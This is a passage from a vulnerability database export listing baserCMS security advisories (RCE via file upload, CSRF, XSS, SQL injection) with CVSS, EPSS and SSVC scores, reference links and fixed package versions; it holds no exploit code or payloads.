scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_14134801
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
reference_id CVE-2021-39136
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.1
purl pkg:composer/baserproject/basercms@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-j37y-gws9-ake9
12
vulnerability VCID-jby7-s5ez-dqb3
13
vulnerability VCID-k575-suuf-7bhf
14
vulnerability VCID-k5qv-4yp3-zbgf
15
vulnerability VCID-khft-xvrw-g3dr
16
vulnerability VCID-kmpp-6j49-pqfz
17
vulnerability VCID-mfm9-gsh3-ubg8
18
vulnerability VCID-nxrf-64er-xbfx
19
vulnerability VCID-p695-t9ye-v3ga
20
vulnerability VCID-pd8c-9d7z-zkhg
21
vulnerability VCID-sqr4-v889-tff8
22
vulnerability VCID-u16w-rbuk-ybfs
23
vulnerability VCID-uedz-j2vn-cbea
24
vulnerability VCID-y2sz-c6vb-pkdp
25
vulnerability VCID-zqd4-rdem-jfgk
26
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1
aliases CVE-2021-39136, GHSA-hgjr-632x-qpp3
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe
14
url VCID-j37y-gws9-ake9
vulnerability_id VCID-j37y-gws9-ake9
summary 
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
reference_id
reference_type
scores
0
value 0.02083
scoring_system epss
scoring_elements 0.84309
published_at 2026-06-04T12:55:00Z
1
value 0.02083
scoring_system epss
scoring_elements 0.84332
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
3
reference_url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
4
reference_url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
5
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
reference_id CVE-2023-25654
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
7
reference_url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
8
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25654, GHSA-h4cc-fxpp-pgw9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9
15
url VCID-jby7-s5ez-dqb3
vulnerability_id VCID-jby7-s5ez-dqb3
summary Cross-Site Request Forgery (CSRF) in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
reference_id
reference_type
scores
0
value 0.00118
scoring_system epss
scoring_elements 0.3025
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
1
reference_url https://basercms.net/security/JVN_99052047
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://basercms.net/security/JVN_99052047
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
5
reference_url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43649, GHSA-fw9x-cqjq-7jx5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3
16
url VCID-k575-suuf-7bhf
vulnerability_id VCID-k575-suuf-7bhf
summary 
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
reference_id
reference_type
scores
0
value 0.00143
scoring_system epss
scoring_elements 0.34314
published_at 2026-06-04T12:55:00Z
1
value 0.00143
scoring_system epss
scoring_elements 0.34412
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
5
reference_url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
reference_id GHSA-vxwf-79ch-f7f7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-41994, GHSA-vxwf-79ch-f7f7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf
17
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary 
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
18
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in HTTP 400 Bad Request to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
19
url VCID-kmpp-6j49-pqfz
vulnerability_id VCID-kmpp-6j49-pqfz
summary 
baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability on the management system of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.1 and earlier versions.

### Vulnerability
Execution of malicious JavaScript code may alter the display of the page or leak cookie information.
- In Favorite registration (CVE-2022-39325)
- In Permission Settings (CVE-2022-41994)
- In User group management (CVE-2022-42486)

### Countermeasures
Update to the latest version of baserCMS

### Credits
- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.
- YUYA KOTAKE@CARTA HOLDINGS, INC.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
reference_id
reference_type
scores
0
value 0.00687
scoring_system epss
scoring_elements 0.72163
published_at 2026-06-05T12:55:00Z
1
value 0.00687
scoring_system epss
scoring_elements 0.72122
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
7
reference_url https://github.com/advisories/GHSA-395x-wv32-44v5
reference_id GHSA-395x-wv32-44v5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
